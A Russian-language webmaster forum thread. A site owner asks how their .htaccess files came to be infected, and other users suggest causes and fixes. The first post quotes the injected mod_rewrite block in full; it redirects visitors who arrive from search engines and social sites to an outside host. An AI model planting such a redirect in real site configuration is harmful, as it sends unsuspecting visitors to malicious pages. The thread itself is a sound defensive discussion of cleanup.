Заражение файла .htaccess

12 3
imd
На сайте с 23.05.2009
Offline
102
imd
2684

На многих сайтах, созданый у нас началось заражение файла .htaccess

Вобщем добавляется кусок кода

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php [R=301,L]
</IfModule>
#/c3284d#

После этого гугл не пускает на сайт, пишет что он заражен

Вопрос. Кто и как это может делать?

SS
На сайте с 28.05.2008
Offline
154
#1

Кто - хакеры.

Как - Через доступ к ftp,ssh,админку,webshell,автоматическим скриптом.

imd
На сайте с 23.05.2009
Offline
102
imd
#2

спасибо, за очень "информативный" ответ =). Может кто-то больше знает об этом?

webinteger
На сайте с 13.10.2007
Offline
110
#3

что делать? - сменить все пароли!

п.с не сохранять пароли в менеджерах ...

> PHP & mySQL написание и доработка скриптов Page 1 (/ru/forum/173281) Page 2 (/ru/forum/377616)
SS
На сайте с 28.05.2008
Offline
154
#4

Ну очевидно же, сайт ваш взломали (либо соседние на хостинге), либо достали из логов вирусов. И теперь правят ваш htaccess.

Что вы хотите знать подробнее? Задавайте вопросы конкретнее, объясню все что и как.

slaveofmoney
На сайте с 18.08.2008
Offline
131
#5
imd:
спасибо, за очень "информативный" ответ =). Может кто-то больше знает об этом?

а что вам не понятно? у вас на компе троян тырит пароли от ftp/ssh клиента, через который вы лазите на хостинг, ну а имея пароль заражает ваши сайты.

проверить свой комп на вирусы, сменить пароли доступа.

пусто )
Fat Bear
На сайте с 01.12.2006
Offline
264
#6

imd, а вам нужно назвать имена и расписать технологии взлома?

Пароли не надо хранить в ftp-клиентах и доступы налево-направо раздавать.

Извечная проблема коллектива, где вебмастеров больше одного.

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
imd
На сайте с 23.05.2009
Offline
102
imd
#7

У меня только один вопрос.

1. Это делает скрипт который копируется на хостинг или который заходит через фтп и правит?

Из этого следует что делать дальше, либо достаточно поменять пароли, либо искать скрипт в файлах сайта.

SS
На сайте с 28.05.2008
Offline
154
#8

Ну я же написал, варианты могут быть такие: Через доступ к ftp,ssh,админку,webshell,автоматическим скриптом.

Стоит сменить все пароли а также поискать webshell на сайте.

Если сами не справитесь - стучитесь, могу заняться на платной основе.

SeVlad
На сайте с 03.11.2008
Offline
1609
#9
imd:
У меня только один вопрос.
1. Это делает скрипт который копируется на хостинг или который заходит через фтп и правит?

Это точно могут сказать только логи сервера.

Люди же тут абсолютно правильно говорят - вариантов может быть много. И лечение тоже в зависимости от диагноза.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
SandyMan
На сайте с 13.06.2004
Offline
129
#10

обратитесь в тех.поддержку хостинга, пусть поищут на сайте shell скрипты, а также проверют в логах сервера кто менял поражённые файлы в последнее время.

Очень часто ломают сайты сделанные на опенсорсных движках, проверьте, что вы используете последнюю версию движка. Часто на их форумах пишут о похожих взломах и защите

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий